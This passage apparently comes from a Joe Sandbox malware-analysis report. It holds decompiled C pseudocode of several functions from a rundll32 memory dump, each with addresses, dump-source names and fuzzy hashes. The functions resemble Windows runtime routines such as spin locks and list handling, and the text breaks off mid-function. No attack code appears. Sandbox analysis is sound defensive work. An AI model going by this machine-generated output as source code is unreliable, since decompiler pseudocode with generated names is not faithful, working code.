                                                                                            					if(_t84 == 0) {
                                                                                            						_t101[1] = _t101[1] & _t84;
                                                                                            						 *_t101 = 1;
                                                                                            					}
                                                                                            					goto L19;
                                                                                            				} else {
                                                                                            					if(_t101 == 0) {
                                                                                            						E045DCC50(E045D4510(0xc000000d));
                                                                                            						_t88 =  *_t101;
                                                                                            						_t97 = _t101[1];
                                                                                            						L15:
                                                                                            						_v12 = _t88;
                                                                                            						_t66 = _t88 -  *_t75;
                                                                                            						_t89 = _t97;
                                                                                            						asm("sbb ecx, [ebx+0x4]");
                                                                                            						_t118 = _t89 - _t97;
                                                                                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                                            							_t66 = _t66 | 0xffffffff;
                                                                                            							_t89 = 0x7fffffff;
                                                                                            						}
                                                                                            						 *_t101 = _t66;
                                                                                            						_t101[1] = _t89;
                                                                                            						L19:
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            						} else {
                                                                                            							_t58 = 0x7ffe0386;
                                                                                            						}
                                                                                            						_t102 = _v16;
                                                                                            						if( *_t58 != 0) {
                                                                                            							_t58 = E046A8ED6(_t102, _t98);
                                                                                            						}
                                                                                            						_t76 = _v44;
                                                                                            						E045F2280(_t58, _v44);
                                                                                            						E045FDD82(_v44, _t102, _t98);
                                                                                            						E045FB944(_t102, _v5);
                                                                                            						return E045EFFB0(_t76, _t98, _t76);
                                                                                            					}
                                                                                            					_t99 = 0x7ffe03b0;
                                                                                            					do {
                                                                                            						_t103 = 0x7ffe0010;
                                                                                            						do {
                                                                                            							_t67 =  *0x46c8628; // 0x0
                                                                                            							_v28 = _t67;
                                                                                            							_t68 =  *0x46c862c; // 0x0
                                                                                            							_v32 = _t68;
                                                                                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                                            							_v20 =  *_t99;
                                                                                            							while(1) {
                                                                                            								_t97 =  *0x7ffe000c;
                                                                                            								_t90 =  *0x7FFE0008;
                                                                                            								if(_t97 ==  *_t103) {
                                                                                            									goto L10;
                                                                                            								}
                                                                                            								asm("pause");
                                                                                            							}
                                                                                            							L10:
                                                                                            							_t79 = _v24;
                                                                                            							_t99 = 0x7ffe03b0;
                                                                                            							_v12 =  *0x7ffe03b0;
                                                                                            							_t72 =  *0x7FFE03B4;
                                                                                            							_t103 = 0x7ffe0010;
                                                                                            							_v36 = _t72;
                                                                                            						} while (_v20 != _v12 || _t79 != _t72);
                                                                                            						_t73 =  *0x46c8628; // 0x0
                                                                                            						_t105 = _v28;
                                                                                            						_t80 =  *0x46c862c; // 0x0
                                                                                            					} while (_t105 != _t73 || _v32 != _t80);
                                                                                            					_t98 = _v40;
                                                                                            					asm("sbb edx, [ebp-0x20]");
                                                                                            					_t88 = _t90 - _v12 - _t105;
                                                                                            					_t75 = _a4;
                                                                                            					asm("sbb edx, eax");
                                                                                            					_t31 = _t98 + 0xc8; // 0x469fb53
                                                                                            					_t101 = _t31;
                                                                                            					 *_t101 = _t88;
                                                                                            					_t101[1] = _t97;
                                                                                            					goto L15;
                                                                                            				}
                                                                                            			}

                                                                                            0x045fdcdc
                                                                                            0x045fdce2
                                                                                            0x045fdce4
                                                                                            0x00000000
                                                                                            0x045fdce4

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed70fd39ed0f2da18d619b7899f7871261718e37bac73a8d7044a485d3d20d79
                                                                                            • Instruction ID: 9ca7ba3d186097ee9b571d9fd33d43bb5ea06b630db96d09b66789d2d14eb78f
                                                                                            • Opcode Fuzzy Hash: ed70fd39ed0f2da18d619b7899f7871261718e37bac73a8d7044a485d3d20d79
                                                                                            • Instruction Fuzzy Hash: 9051B071A01605DFCB14CF68C880AAEBBF1BF88354F20855ADA56E7344EB30B948DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 96%
                                                                                            			E045EEF40(intOrPtr __ecx) {
                                                                                            				char _v5;
                                                                                            				char _v6;
                                                                                            				char _v7;
                                                                                            				char _v8;
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				intOrPtr _t58;
                                                                                            				char _t59;
                                                                                            				signed char _t69;
                                                                                            				void* _t73;
                                                                                            				signed int _t74;
                                                                                            				char _t79;
                                                                                            				signed char _t81;
                                                                                            				signed int _t85;
                                                                                            				signed int _t87;
                                                                                            				intOrPtr _t90;
                                                                                            				signed char* _t91;
                                                                                            				void* _t92;
                                                                                            				signed int _t94;
                                                                                            				void* _t96;
                                                                                            
                                                                                            				_t90 = __ecx;
                                                                                            				_v16 = __ecx;
                                                                                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                            					_t58 =  *((intOrPtr*)(__ecx));
                                                                                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                            						E045D9080(_t73, __ecx, __ecx, _t92);
                                                                                            					}
                                                                                            				}
                                                                                            				_t74 = 0;
                                                                                            				_t96 =  *0x7ffe036a - 1;
                                                                                            				_v12 = 0;
                                                                                            				_v7 = 0;
                                                                                            				if(_t96 > 0) {
                                                                                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                            					_v12 = _t74;
                                                                                            					_v7 = _t96 != 0;
                                                                                            				}
                                                                                            				_t79 = 0;
                                                                                            				_v8 = 0;
                                                                                            				_v5 = 0;
                                                                                            				while(1) {
                                                                                            					L4:
                                                                                            					_t59 = 1;
                                                                                            					L5:
                                                                                            					while(1) {
                                                                                            						if(_t59 == 0) {
                                                                                            							L12:
                                                                                            							_t21 = _t90 + 4; // 0x77cfc21e
                                                                                            							_t87 =  *_t21;
                                                                                            							_v6 = 0;
                                                                                            							if(_t79 != 0) {
                                                                                            								if((_t87 & 0x00000002) != 0) {
                                                                                            									goto L19;
                                                                                            								}
                                                                                            								if((_t87 & 0x00000001) != 0) {
                                                                                            									_v6 = 1;
                                                                                            									_t74 = _t87 ^ 0x00000003;
                                                                                            								} else {
                                                                                            									_t51 = _t87 - 2; // -2
                                                                                            									_t74 = _t51;
                                                                                            								}
                                                                                            								goto L15;
                                                                                            							} else {
                                                                                            								if((_t87 & 0x00000001) != 0) {
                                                                                            									_v6 = 1;
                                                                                            									_t74 = _t87 ^ 0x00000001;
                                                                                            								} else {
                                                                                            									_t26 = _t87 - 4; // -4
                                                                                            									_t74 = _t26;
                                                                                            									if((_t74 & 0x00000002) == 0) {
                                                                                            										_t74 = _t74 - 2;
                                                                                            									}
                                                                                            								}
                                                                                            								L15:
                                                                                            								if(_t74 == _t87) {
                                                                                            									L19:
                                                                                            									E045D2D8A(_t74, _t90, _t87, _t90);
                                                                                            									_t74 = _v12;
                                                                                            									_v8 = 1;
                                                                                            									if(_v7 != 0 && _t74 > 0x64) {
                                                                                            										_t74 = _t74 - 1;
                                                                                            										_v12 = _t74;
                                                                                            									}
                                                                                            									_t79 = _v5;
                                                                                            									goto L4;
                                                                                            								}
                                                                                            								asm("lock cmpxchg [esi], ecx");
                                                                                            								if(_t87 != _t87) {
                                                                                            									_t74 = _v12;
                                                                                            									_t59 = 0;
                                                                                            									_t79 = _v5;
                                                                                            									continue;
                                                                                            								}
                                                                                            								if(_v6 != 0) {
                                                                                            									_t74 = _v12;
                                                                                            									L25:
                                                                                            									if(_v7 != 0) {
                                                                                            										if(_t74 < 0x7d0) {
                                                                                            											if(_v8 == 0) {
                                                                                            												_t74 = _t74 + 1;
                                                                                            											}
                                                                                            										}
                                                                                            										_t38 = _t90 + 0x14; // 0x0
                                                                                            										_t39 = _t90 + 0x14; // 0x0
                                                                                            										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                            										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                            											_t85 = _t85 & 0xff000000;
                                                                                            										}
                                                                                            										 *(_t90 + 0x14) = _t85;
                                                                                            									}
                                                                                            									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                            									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                            									return 0;
                                                                                            								}
                                                                                            								_v5 = 1;
                                                                                            								_t87 = _t74;
                                                                                            								goto L19;
                                                                                            							}
                                                                                            						}
                                                                                            						_t94 = _t74;
                                                                                            						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                            						if(_t74 == 0) {
                                                                                            							goto L12;
                                                                                            						} else {
                                                                                            							_t91 = _t90 + 4;
                                                                                            							goto L8;
                                                                                            							L9:
                                                                                            							while((_t81 & 0x00000001) != 0) {
                                                                                            								_t69 = _t81;
                                                                                            								asm("lock cmpxchg [edi], edx");
                                                                                            								if(_t69 != _t81) {
                                                                                            									_t81 = _t69;
                                                                                            									continue;
                                                                                            								}
                                                                                            								_t90 = _v16;
                                                                                            								goto L25;
                                                                                            							}
                                                                                            							asm("pause");
                                                                                            							_t94 = _t94 - 1;
                                                                                            							if(_t94 != 0) {
                                                                                            								L8:
                                                                                            								_t81 =  *_t91;
                                                                                            								goto L9;
                                                                                            							} else {
                                                                                            								_t90 = _v16;
                                                                                            								_t79 = _v5;
                                                                                            								goto L12;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            			}

                                                                                            0x045eefb2
                                                                                            0x045ef036
                                                                                            0x045ef03a
                                                                                            0x045ef040
                                                                                            0x045ef090
                                                                                            0x00000000
                                                                                            0x045ef092
                                                                                            0x045ef042
                                                                                            0x00000000
                                                                                            0x045ef042
                                                                                            0x045eefb7
                                                                                            0x045eefb9
                                                                                            0x045eefbc
                                                                                            0x045eefb0
                                                                                            0x045eefb0
                                                                                            0x00000000
                                                                                            0x045eefbe
                                                                                            0x045eefbe
                                                                                            0x045eefc1
                                                                                            0x00000000
                                                                                            0x045eefc1
                                                                                            0x045eefbc
                                                                                            0x045eefaa
                                                                                            0x045eef91

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction ID: 473ef1ca650f30dd653ff7f5755842549d476ebc2be63b611c911c8d19a21763
                                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction Fuzzy Hash: 31513131A04249EFDB28CF6AD0C17BEBBB1BF05314F1881A8C55653282EB75B989E741
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 84%
                                                                                            			E046A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                            				signed short* _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _t55;
                                                                                            				void* _t56;
                                                                                            				intOrPtr* _t66;
                                                                                            				intOrPtr* _t69;
                                                                                            				void* _t74;
                                                                                            				intOrPtr* _t78;
                                                                                            				intOrPtr* _t81;
                                                                                            				intOrPtr* _t82;
                                                                                            				intOrPtr _t83;
                                                                                            				signed short* _t84;
                                                                                            				intOrPtr _t85;
                                                                                            				signed int _t87;
                                                                                            				intOrPtr* _t90;
                                                                                            				intOrPtr* _t93;
                                                                                            				intOrPtr* _t94;
                                                                                            				void* _t98;
                                                                                            
                                                                                            				_t84 = __edx;
                                                                                            				_t80 = __ecx;
                                                                                            				_push(__ecx);
                                                                                            				_push(__ecx);
                                                                                            				_t55 = __ecx;
                                                                                            				_v8 = __edx;
                                                                                            				_t87 =  *__edx & 0x0000ffff;
                                                                                            				_v12 = __ecx;
                                                                                            				_t3 = _t55 + 0x154; // 0x154
                                                                                            				_t93 = _t3;
                                                                                            				_t78 =  *_t93;
                                                                                            				_t4 = _t87 + 2; // 0x2
                                                                                            				_t56 = _t4;
                                                                                            				while(_t78 != _t93) {
                                                                                            					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                            						L4:
                                                                                            						_t78 =  *_t78;
                                                                                            						continue;
                                                                                            					} else {
                                                                                            						_t7 = _t78 + 0x18; // 0x18
                                                                                            						if(E0462D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                            							_t40 = _t78 + 0xc; // 0xc
                                                                                            							_t94 = _t40;
                                                                                            							_t90 =  *_t94;
                                                                                            							while(_t90 != _t94) {
                                                                                            								_t41 = _t90 + 8; // 0x8
                                                                                            								_t74 = E0461F380(_a4, _t41, 0x10);
                                                                                            								_t98 = _t98 + 0xc;
                                                                                            								if(_t74 != 0) {
                                                                                            									_t90 =  *_t90;
                                                                                            									continue;
                                                                                            								}
                                                                                            								goto L12;
                                                                                            							}
                                                                                            							_t82 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                            							if(_t82 != 0) {
                                                                                            								_t46 = _t78 + 0xc; // 0xc
                                                                                            								_t69 = _t46;
                                                                                            								asm("movsd");
                                                                                            								asm("movsd");
                                                                                            								asm("movsd");
                                                                                            								asm("movsd");
                                                                                            								_t85 =  *_t69;
                                                                                            								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                            									L20:
                                                                                            									_t82 = 3;
                                                                                            									asm("int 0x29");
                                                                                            								}
                                                                                            								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                            								 *_t82 = _t85;
                                                                                            								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                            								 *_t69 = _t82;
                                                                                            								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                            								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                            								goto L11;
                                                                                            							} else {
                                                                                            								L18:
                                                                                            								_push(0xe);
                                                                                            								_pop(0);
                                                                                            							}
                                                                                            						} else {
                                                                                            							_t84 = _v8;
                                                                                            							_t9 = _t87 + 2; // 0x2
                                                                                            							_t56 = _t9;
                                                                                            							goto L4;
                                                                                            						}
                                                                                            					}
                                                                                            					L12:
                                                                                            					return 0;
                                                                                            				}
                                                                                            				_t10 = _t87 + 0x1a; // 0x1a
                                                                                            				_t78 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                            				if(_t78 == 0) {
                                                                                            					goto L18;
                                                                                            				} else {
                                                                                            					_t12 = _t87 + 2; // 0x2
                                                                                            					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                            					_t16 = _t78 + 0x18; // 0x18
                                                                                            					E0461F3E0(_t16, _v8[2], _t87);
                                                                                            					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                            					_t19 = _t78 + 0xc; // 0xc
                                                                                            					_t66 = _t19;
                                                                                            					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                            					 *_t66 = _t66;
                                                                                            					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                            					_t81 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                            					if(_t81 == 0) {
                                                                                            						goto L18;
                                                                                            					} else {
                                                                                            						_t26 = _t78 + 0xc; // 0xc
                                                                                            						_t69 = _t26;
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						_t85 =  *_t69;
                                                                                            						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                            							goto L20;
                                                                                            						} else {
                                                                                            							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                            							 *_t81 = _t85;
                                                                                            							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                            							 *_t69 = _t81;
                                                                                            							_t83 = _v12;
                                                                                            							 *(_t78 + 8) = 1;
                                                                                            							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                            							_t34 = _t83 + 0x154; // 0x1ba
                                                                                            							_t69 = _t34;
                                                                                            							_t85 =  *_t69;
                                                                                            							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                            								goto L20;
                                                                                            							} else {
                                                                                            								 *_t78 = _t85;
                                                                                            								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                            								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                            								 *_t69 = _t78;
                                                                                            								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                            							}
                                                                                            						}
                                                                                            						goto L11;
                                                                                            					}
                                                                                            				}
                                                                                            				goto L12;
                                                                                            			}

                                                                                            0x046a74d6
                                                                                            0x046a74d8
                                                                                            0x046a74db
                                                                                            0x046a74dd
                                                                                            0x046a74e0
                                                                                            0x046a74e7
                                                                                            0x046a74ee
                                                                                            0x046a74ee
                                                                                            0x046a74f4
                                                                                            0x046a74f9
                                                                                            0x00000000
                                                                                            0x046a74fb
                                                                                            0x046a74fb
                                                                                            0x046a74fd
                                                                                            0x046a7500
                                                                                            0x046a7503
                                                                                            0x046a7505
                                                                                            0x046a7505
                                                                                            0x046a74f9
                                                                                            0x00000000
                                                                                            0x046a74cd
                                                                                            0x046a74b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction ID: 206bb8f698d2ae92eef0a3816ed3a50598856b0224e7ab9819a910ee9a0de3e2
                                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction Fuzzy Hash: D9517C71600A06EFDB15CF14D880A56BBB5FF55309F1881AAE9089F212E771FE56CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 97%
                                                                                            			E04602990() {
                                                                                            				signed int* _t62;
                                                                                            				signed int _t64;
                                                                                            				intOrPtr _t66;
                                                                                            				signed short* _t69;
                                                                                            				intOrPtr _t76;
                                                                                            				signed short* _t79;
                                                                                            				void* _t81;
                                                                                            				signed int _t82;
                                                                                            				signed short* _t83;
                                                                                            				signed int _t87;
                                                                                            				intOrPtr _t91;
                                                                                            				void* _t98;
                                                                                            				signed int _t99;
                                                                                            				void* _t101;
                                                                                            				signed int* _t102;
                                                                                            				void* _t103;
                                                                                            				void* _t104;
                                                                                            				void* _t107;
                                                                                            
                                                                                            				_push(0x20);
                                                                                            				_push(0x46aff00);
                                                                                            				E0462D08C(_t81, _t98, _t101);
                                                                                            				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                                            				_t99 = 0;
                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                                            				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                            				if(_t82 == 0) {
                                                                                            					_t62 = 0xc0000100;
                                                                                            				} else {
                                                                                            					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                            					_t102 = 0xc0000100;
                                                                                            					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                                            					_t64 = 4;
                                                                                            					while(1) {
                                                                                            						 *(_t103 - 0x24) = _t64;
                                                                                            						if(_t64 == 0) {
                                                                                            							break;
                                                                                            						}
                                                                                            						_t87 = _t64 * 0xc;
                                                                                            						 *(_t103 - 0x2c) = _t87;
                                                                                            						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x45b1664));
                                                                                            						if(_t107 <= 0) {
                                                                                            							if(_t107 == 0) {
                                                                                            								_t79 = E0461E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x45b1668)), _t82);
                                                                                            								_t104 = _t104 + 0xc;
                                                                                            								__eflags = _t79;
                                                                                            								if(__eflags == 0) {
                                                                                            									_t102 = E046551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x45b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                            									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                                            									break;
                                                                                            								} else {
                                                                                            									_t64 =  *(_t103 - 0x24);
                                                                                            									goto L5;
                                                                                            								}
                                                                                            								goto L13;
                                                                                            							} else {
                                                                                            								L5:
                                                                                            								_t64 = _t64 - 1;
                                                                                            								continue;
                                                                                            							}
                                                                                            						}
                                                                                            						break;
                                                                                            					}
                                                                                            					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                            					__eflags = _t102;
                                                                                            					if(_t102 < 0) {
                                                                                            						__eflags = _t102 - 0xc0000100;
                                                                                            						if(_t102 == 0xc0000100) {
                                                                                            							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                            							__eflags = _t83;
                                                                                            							if(_t83 != 0) {
                                                                                            								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                                            								__eflags =  *_t83 - _t99;
                                                                                            								if( *_t83 == _t99) {
                                                                                            									_t102 = 0xc0000100;
                                                                                            									goto L19;
                                                                                            								} else {
                                                                                            									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                                            									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                                            									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                                            									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                                            										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                                            										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                                            											L26:
                                                                                            											_t102 = E04602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                            											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                            											__eflags = _t102 - 0xc0000100;
                                                                                            											if(_t102 != 0xc0000100) {
                                                                                            												goto L12;
                                                                                            											} else {
                                                                                            												_t99 = 1;
                                                                                            												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                                            												goto L18;
                                                                                            											}
                                                                                            										} else {
                                                                                            											_t69 = E045E6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                                            											__eflags = _t69;
                                                                                            											if(_t69 != 0) {
                                                                                            												goto L26;
                                                                                            											} else {
                                                                                            												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                            												goto L18;
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										L18:
                                                                                            										_t102 = E04602C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                                            										L19:
                                                                                            										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                            										goto L12;
                                                                                            									}
                                                                                            								}
                                                                                            								L28:
                                                                                            							} else {
                                                                                            								E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                                            								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                                            								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                                            								_t76 = E04602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                                            								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                                            								__eflags = _t76 - 0xc0000100;
                                                                                            								if(_t76 == 0xc0000100) {
                                                                                            									 *((intOrPtr*)(_t103 - 0x1c)) = E04602C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                                            								}
                                                                                            								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                                            								E04602ACB();
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					L12:
                                                                                            					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                                            					_t62 = _t102;
                                                                                            				}
                                                                                            				L13:
                                                                                            				return E0462D0D1(_t62);
                                                                                            				goto L28;
                                                                                            			}





















                                                                                            0x04602a21
                                                                                            0x04602a24
                                                                                            0x04602a35
                                                                                            0x04602a3a
                                                                                            0x04602a3d
                                                                                            0x04602a42
                                                                                            0x04602a59
                                                                                            0x04602a59
                                                                                            0x04602a5c
                                                                                            0x04602a5f
                                                                                            0x04602a5f
                                                                                            0x046029fa
                                                                                            0x046029f3
                                                                                            0x04602a64
                                                                                            0x04602a64
                                                                                            0x04602a6b
                                                                                            0x04602a6b
                                                                                            0x04602a6d
                                                                                            0x04602a72
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aafe461a2e59990e14779fefaaa125cd72c7319e1472c018084e6319d22a6f4b
                                                                                            • Instruction ID: 92bdddf4af2d9d5a0a504b181b97f323f12e0d1e099affd9e9f5b15ea236cac4
                                                                                            • Opcode Fuzzy Hash: aafe461a2e59990e14779fefaaa125cd72c7319e1472c018084e6319d22a6f4b
                                                                                            • Instruction Fuzzy Hash: 0B516871A00219EFDF29DF55C894ADEBBB5BF58314F108099E805AB3A0E731AD52DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 78%
                                                                                            			E04604D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				signed int _v12;
                                                                                            				char _v176;
                                                                                            				char _v177;
                                                                                            				char _v184;
                                                                                            				intOrPtr _v192;
                                                                                            				intOrPtr _v196;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed short _t42;
                                                                                            				char* _t44;
                                                                                            				intOrPtr _t46;
                                                                                            				intOrPtr _t50;
                                                                                            				char* _t57;
                                                                                            				intOrPtr _t59;
                                                                                            				intOrPtr _t67;
                                                                                            				signed int _t69;
                                                                                            
                                                                                            				_t64 = __edx;
                                                                                            				_v12 =  *0x46cd360 ^ _t69;
                                                                                            				_t65 = 0xa0;
                                                                                            				_v196 = __edx;
                                                                                            				_v177 = 0;
                                                                                            				_t67 = __ecx;
                                                                                            				_v192 = __ecx;
                                                                                            				E0461FA60( &_v176, 0, 0xa0);
                                                                                            				_t57 =  &_v176;
                                                                                            				_t59 = 0xa0;
                                                                                            				if( *0x46c7bc8 != 0) {
                                                                                            					L3:
                                                                                            					while(1) {
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						asm("movsd");
                                                                                            						_t67 = _v192;
                                                                                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                            						_push( &_v184);
                                                                                            						_push(_t59);
